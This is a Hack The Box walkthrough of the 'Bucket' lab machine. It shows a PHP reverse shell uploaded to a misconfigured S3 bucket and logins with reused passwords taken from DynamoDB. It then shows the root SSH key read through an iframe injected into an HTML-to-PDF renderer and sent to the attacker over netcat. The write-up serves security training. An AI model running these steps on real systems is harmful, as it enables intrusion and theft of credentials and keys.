
Hack The Box – Bucket Walkthrough

Introduction

This was an intermediate Linux box that involved exploiting an insecure AWS S3 bucket to upload a PHP reverse shell and gain remote access, using credentials found in an unprotected DynamoDB database to obtain a user shell, and exploiting a vulnerable PHP script through the same DynamoDB database to extract the root user’s private SSH key and escalate privileges to root.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions
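
A typical invocation with these flags, assuming the target’s IP address is 10.10.10.212 (Nmap scans the 1000 most common ports by default, so no extra port flag is needed):

nmap -sC -sV 10.10.10.212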

The Nmap scan detected only two open ports, 22 (SSH) and 80 (HTTP), so the next logical step is to start enumerating HTTP.

Enumerating HTTP

When navigating to the web server through a browser, it redirects to bucket.htb and displays an error:

Adding a bucket.htb entry to the /etc/hosts file:

The site now loads properly; it appears to be a fairly standard site without many features:

Looking at the source code, some links mention an s3.bucket.htb URL:

Adding s3.bucket.htb to the /etc/hosts file:
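
Both host entries can be appended from the command line; a sketch, assuming the target’s IP address is 10.10.10.212:

echo "10.10.10.212 bucket.htb s3.bucket.htb" | sudo tee -a /etc/hosts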

When navigating to it, the following is displayed, indicating an S3 bucket is running:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads
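
A typical command line combining these flags (the word list, extensions and thread count shown are assumptions, not necessarily the exact values used):

gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/dirb/common.txt -x php,html -t 30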

The /health directory mentions that S3 and DynamoDB are running:

Whereas when navigating to /shell, a DynamoDB JavaScript Shell comes up:

Enumerating Amazon S3 Bucket & DynamoDB

An Amazon S3 bucket is a public cloud storage resource available in Amazon Web Services’ (AWS) Simple Storage Service (S3), an object storage offering. Amazon S3 buckets, which are similar to file folders, store objects, which consist of data and its descriptive metadata. These can often be misconfigured and allow unauthenticated users to access files within the buckets or upload arbitrary files.

The AWS Command Line Interface can be used to enumerate and interact with S3 buckets. Installing the tool:
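
On Debian-based systems this can typically be done through the package manager (the installation method may vary by distribution):

sudo apt install awscli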

To be able to use the tool, an Access Key ID and Secret Access Key, which can be obtained by registering with AWS, are normally required, although in this scenario, since the target is within the same network, this won’t be necessary. The following steps can be followed to obtain an access key:

Browsing to AWS and hitting the “Create a Free Account” button:

Entering an email address, password and account name:

Navigating to the Account name -> My Security Credentials menu:

Under the Access keys section, the “Show Access Key” button will display the current Access ID and Key:

Running the aws configure command to set up the AWS command line tool, specifying the Access ID, Key and Region:
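
The same configuration can also be applied non-interactively with aws configure set; the key values below are the placeholder examples from the AWS documentation, since any syntactically valid values appear to work against this target:

aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE
aws configure set aws_secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRiCYEXAMPLEKEY
aws configure set region us-east-1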

Since the application seems to be running DynamoDB, the AWS command line tool might have a way to interact with it. After looking up the official AWS CLI documentation, it looks like the following command can be used to interact with a DynamoDB database and issue a query to list all available tables:

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb

Issuing the command returns one “users” table:

There still doesn’t seem to be a clear way to look at the records stored in this table. Using the “aws dynamodb help” command to see what commands are available:

The scan command looks interesting, more information can be found by using the “aws dynamodb scan help” command:

After looking up the documentation for this command, it looks like the only required argument is the table name:

Using the following command to view the records within the users table:

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb

It looks like this contains a few usernames and passwords, although they don’t seem to be useful at this stage.

After a bit of research, I came across this article, which mentioned a few useful commands for enumerating S3 buckets, one of which is the “ls” command, used to list the files in a bucket.
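
A typical invocation (the bucket name adserver is taken from the upload commands later in this walkthrough):

aws s3 ls --endpoint-url http://s3.bucket.htb s3://adserver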

Running the ls command unfortunately does not reveal any useful files.

Another useful command mentioned in the article is the “cp” command, which copies local files to an S3 bucket. Since this bucket also backs the web server, remote code execution could be achieved by uploading PHP files to it. The cp command only requires the source file and the destination as arguments:

Exploiting Amazon S3 Bucket File Upload

To initially test the cp command, creating a “test.txt” file and transferring it across using the following command:

aws s3 cp test.txt --endpoint-url http://s3.bucket.htb s3://adserver/test.txt

Accessing the file through the browser displays the content of it, which means the upload was successful:

The exploitation process has to be done very quickly, as the server cleans up files every minute or so. Copying the laudanum PHP reverse shell to the current working directory and changing the IP address and port:
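
On Kali, the laudanum shells typically live under /usr/share/laudanum (the exact path is an assumption); after copying, the $ip and $port variables at the top of the script are edited to point at the attacking machine:

cp /usr/share/laudanum/php/php-reverse-shell.php .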

Running the following command to copy the PHP reverse shell to the S3 bucket:

aws s3 cp php-reverse-shell.php --endpoint-url http://s3.bucket.htb s3://adserver/shell.php

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on
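
Combining these flags, and assuming the reverse shell was configured to connect back on port 443:

nc -lvnp 443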

Navigating to the shell through the browser:

Received a callback on the Netcat listener, granting a shell as the www-data user:

The following steps can be done to obtain an interactive shell:

  • Running python3 -c 'import pty; pty.spawn("/bin/sh")' on the victim host
  • Hitting CTRL+Z to background the process and go back to the local host
  • Running stty raw -echo on the local host
  • Typing fg and hitting ENTER to go back to the reverse shell

When enumerating files and folders in the /home directory, it appears roy’s home directory contains a db.php file within the project folder, which is presumably used to start DynamoDB:

As this indicates roy may be responsible for the DynamoDB database, it is worth trying to log in as roy using the credentials found earlier:
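
For example, switching users from the www-data shell (the password being one of those recovered from the users table):

su roy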

It looks like the password for the “Sysadm” user stored in the users table worked.

Privilege Escalation

Transferring the LinPEAS enumeration script to the target machine:
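
A common approach is to serve the script over HTTP from the attacking machine (assumed here to be 10.10.14.2, the address used later in this walkthrough) and fetch it from the target:

python3 -m http.server 8000
wget http://10.10.14.2:8000/linpeas.sh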

Making the script executable and executing it:
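
Assuming the script was saved as linpeas.sh:

chmod +x linpeas.sh
./linpeas.sh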

It appears that port 8000 is listening for incoming local connections:

And Apache seems to be running as root, so this could potentially be a privilege escalation vector:

Navigating to /var/www confirms the presence of a bucket-app folder, which is probably the web application running on port 8000:

The Apache configuration confirms it is running on port 8000:

The application contains an index.php file, and at the beginning of it there is some code that looks peculiar and unrelated to the web application. Going through the code and adding comments to better understand what it does:

<?php
// load the AWS SDK for PHP via Composer's autoloader
require 'vendor/autoload.php';

use Aws\DynamoDb\DynamoDbClient;
// if the file is accessed through a POST request
if ($_SERVER["REQUEST_METHOD"] === "POST") {
    // and the "action" POST parameter is set to "get_alerts"
    if ($_POST["action"] === "get_alerts") {
        date_default_timezone_set('America/New_York');
        // create a DynamoDB client pointing at localhost on port 4566
        $client = new DynamoDbClient([
            'profile' => 'default',
            'region' => 'us-east-1',
            'version' => 'latest',
            'endpoint' => 'http://localhost:4566'
        ]);
        // perform a scan query against the alerts table, filtering for
        // records whose "title" string is "Ransomware"
        $iterator = $client->getIterator('Scan', array(
            'TableName' => 'alerts',
            'FilterExpression' => "title = :title",
            'ExpressionAttributeValues' => array(":title" => array("S" => "Ransomware")),
        ));
        // go through each matching item in the table
        foreach ($iterator as $item) {
            // generate an HTML file whose name is a random number between 1 and 10000
            $name = rand(1, 10000) . '.html';
            // put the contents of the record's "data" string into the file
            file_put_contents('files/' . $name, $item["data"]);
        }
        // convert the HTML file to a PDF using the pd4ml demo jar
        passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
    }
}
else
{
?>

The code above will currently fail since, as seen earlier, there is no alerts table. By creating the table and adding a record containing HTML code, that HTML will be rendered and its output converted to a PDF file. This could allow arbitrary files on the machine to be read.
First of all, the alerts table needs to be created. The create-table command can be used; after consulting the documentation, this is what it requires:

  • Table name
  • Attribute definitions for the fields
  • Key schema, to define the primary key
  • Provisioned throughput, i.e. the read and write capacity units for the table

Using the following command to create an “alerts” table containing a data and a title string:

aws dynamodb --endpoint-url http://s3.bucket.htb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S AttributeName=data,AttributeType=S --key-schema AttributeName=title,KeyType=HASH AttributeName=data,KeyType=RANGE --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5

The next step is to insert the record into the table, using the put-item query, which requires:

  • Table name
  • Item to insert

The items within the table have to be specified using the following syntax, where “S” is the type of field (in this case string):
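
A minimal illustration of this syntax, with placeholder field names and values (the actual item used is shown in the put-item command below):

{"fieldname1": {"S": "value1"}, "fieldname2": {"S": "value2"}}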

Using the following command to insert a record into the table, containing “Ransomware” as the title and an iframe that, when rendered, will pull the root user’s SSH key into the page, which will then be converted to a PDF document:

aws dynamodb --endpoint-url http://s3.bucket.htb put-item --table-name alerts --item '{"title": {"S": "Ransomware"},"data": {"S": "<html><head></head><body><iframe src='/root/.ssh/id_rsa'></iframe></body></html>"}}' --return-consumed-capacity TOTAL

All of these steps, along with the POST request using cURL, have to be done in quick succession, as the server cleans up files and database tables roughly every minute.

The next step is to set up a Netcat listener, which will catch the contents of the file when they are sent to the local machine, redirecting them to a result.pdf file, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on
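
For example, listening on port 443 (the port used in the transfer command below) and redirecting the output to a local file:

nc -lvnp 443 > result.pdf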

Concatenating the commands used earlier to create the table and insert the record, then running the following cURL command to perform the POST request and transfer the file via Netcat:

curl --data "action=get_alerts" http://localhost:8000/; nc 10.10.14.2 443 < /var/www/bucket-app/files/result.pdf

The POST request was successful and the result.pdf file was received by the Netcat listener.

After opening the generated PDF file, it appears this contains the SSH private key for the root user:

Copying the private key to a local file so it can be used with SSH:
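
SSH will refuse a key file with loose permissions, so they need to be restricted; a sketch, assuming the key was saved as id_rsa_root:

chmod 600 id_rsa_root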

Logging in as the root user through SSH using the private key:
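
Assuming the same file name as above:

ssh -i id_rsa_root root@bucket.htb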

Conclusion

I really enjoyed this box, as it forced me to get out of my comfort zone and play around with technologies I had never used before, such as AWS S3 buckets and DynamoDB. It feels like quite a real-life box, as it involved misconfigurations that are fairly common and have already been exploited in the past.